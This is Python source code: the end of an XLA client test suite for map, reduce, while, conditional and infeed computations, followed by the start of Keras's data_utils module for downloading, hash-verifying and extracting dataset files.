c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
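    # SAME padding preserves the 2x3 shape: window positions that hang off the
    # bottom edge are padded with the init value 0, so the second output row is
    # just the input's second row.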
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
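    # The body doubles the value while the condition (value < 10) holds:
    # 1 -> 2 -> 4 -> 8 -> 16, so the loop exits with 16.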
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
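    # The false branch is the constant-1.0 computation, which ignores its
    # operand, so the result is 1.0 rather than the false operand 2.0.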
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
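      # Execute() blocks until the infeed value is supplied and the outfeed is
      # drained, so it runs on a separate thread while the main thread feeds
      # the infeed and then reads the outfeed.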
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import functools
import hashlib
import multiprocessing.dummy
import os
import pathlib
import queue
import random
import shutil
import tarfile
import threading
import time
import typing
import urllib
import weakref
import zipfile
from six.moves.urllib.parse import urlsplit
import numpy as np
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils import io_utils
from tensorflow.python.util.tf_export import keras_export
# Required to support google internal urlretrieve
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
        hook will be passed three arguments: a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
      content_length = response.info().get('Content-Length')
      total_size = -1
      if content_length is not None:
        total_size = int(content_length.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from urllib.request import urlretrieve # pylint: disable=g-importing-member
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return (tf_inspect.isgenerator(x) or
isinstance(x, Sequence) or
isinstance(x, typing.Iterator))
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, str):
archive_format = [archive_format]
file_path = io_utils.path_to_string(file_path)
path = io_utils.path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname=None,
origin=None,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location. If `None`, the
name of the file at `origin` will be used.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
          Boolean, whether the file should be decompressed.
      md5_hash: Deprecated in favor of `file_hash` argument.
          MD5 hash of the file for verification.
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
      cache_dir: Location to store cached files; when None, it defaults to
          `~/.keras/`.
Returns:
Path to the downloaded file
"""
if origin is None:
raise ValueError('Please specify the "origin" argument (URL of the file '
'to download).')
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = io_utils.path_to_string(fname)
if not fname:
fname = os.path.basename(urlsplit(origin).path)
if not fname:
raise ValueError(
f"Can't parse the file name from the origin provided: '{origin}'."
"Please specify the `fname` as the input param.")
if untar:
if fname.endswith('.tar.gz'):
fname = pathlib.Path(fname)
# The 2 `.with_suffix()` are because of `.tar.gz` as pathlib
# considers it as 2 suffixes.
fname = fname.with_suffix('').with_suffix('')
fname = str(fname)
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
io_utils.print_msg(
'A local file was found, but it seems to be '
f'incomplete or outdated because the {hash_algorithm} '
f'file hash does not match the original value of {file_hash} '
'so we will re-download the data.')
download = True
else:
download = True
if download:
io_utils.print_msg(f'Downloading data from {origin}')
class DLProgbar:
"""Manage progress bar state for use in urlretrieve."""
def __init__(self):
self.progbar = None
self.finished = False
def __call__(self, block_num, block_size, total_size):
if not self.progbar:
if total_size == -1:
total_size = None
self.progbar = Progbar(total_size)
        current = block_num * block_size
        if total_size in (None, -1):
          # Content length unknown; just advance the bar by what has arrived.
          self.progbar.update(current)
        elif current < total_size:
          self.progbar.update(current)
        elif not self.finished:
          self.progbar.update(self.progbar.target)
          self.finished = True
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, DLProgbar())
except urllib.error.HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except urllib.error.URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
  # Validate the download if it succeeded and the user provided an expected
  # hash. Security-conscious users should obtain the hash of the file from a
  # separate channel and pass it to this API to prevent MITM / corruption:
if os.path.exists(fpath) and file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
raise ValueError(
f'Incomplete or corrupted file detected. The {hash_algorithm} '
f'file hash does not match the provided value of {file_hash}.')
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _makedirs_exist_ok(datadir):
os.makedirs(datadir, exist_ok=True) # pylint: disable=unexpected-keyword-arg
def _resolve_hasher(algorithm, file_hash=None):
"""Returns hash algorithm as hashlib function."""
if algorithm == 'sha256':
return hashlib.sha256()
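  # A sha256 hex digest is 64 characters long, so a 64-character `file_hash`
  # implies sha256 when the algorithm is left on 'auto'.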
if algorithm == 'auto' and file_hash is not None and len(file_hash) == 64:
return hashlib.sha256()
# This is used only for legacy purposes.
return hashlib.md5()
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
_hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Args:
fpath: path to the file being validated
algorithm: hash algorithm, one of `'auto'`, `'sha256'`, or `'md5'`.
The default `'auto'` detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if isinstance(algorithm, str):
hasher = _resolve_hasher(algorithm)
else:
hasher = algorithm
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Args:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
hasher = _resolve_hasher(algorithm, file_hash)
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
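# Illustrative sketch (not part of the original module): validating a downloaded
# file against a known hash. The path and hash value are hypothetical; in practice
# the expected hash should come from a trusted, separate channel.
#
#   expected = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
#   if not validate_file('/tmp/dataset.zip', expected, algorithm='sha256'):
#       raise ValueError('Downloaded file is corrupted or incomplete.')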
class ThreadsafeIter:
"""Wrap an iterator with a lock and propagate exceptions to all threads."""
def __init__(self, it):
self.it = it
self.lock = threading.Lock()
# After a generator throws an exception all subsequent next() calls raise a
# StopIteration Exception. This, however, presents an issue when mixing
# generators and threading because it means the order of retrieval need not
# match the order in which the generator was called. This can make it appear
# that a generator exited normally when in fact the terminating exception is
# just in a different thread. In order to provide thread safety, once
# self.it has thrown an exception we continue to throw the same exception.
self._exception = None
def __iter__(self):
return self
def next(self):
return self.__next__()
def __next__(self):
with self.lock:
if self._exception:
raise self._exception # pylint: disable=raising-bad-type
try:
return next(self.it)
except Exception as e:
self._exception = e
raise
def threadsafe_generator(f):
@functools.wraps(f)
def g(*a, **kw):
return ThreadsafeIter(f(*a, **kw))
return g
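# Illustrative sketch (not part of the original module): wrapping a generator so
# several threads can pull from it without interleaving `next()` calls. The
# generator and loader below are hypothetical.
#
#   @threadsafe_generator
#   def batch_stream():
#       while True:
#           yield load_next_batch()   # hypothetical loader
#
#   stream = batch_stream()           # safe to share across worker threads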
@keras_export('keras.utils.Sequence')
class Sequence:
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
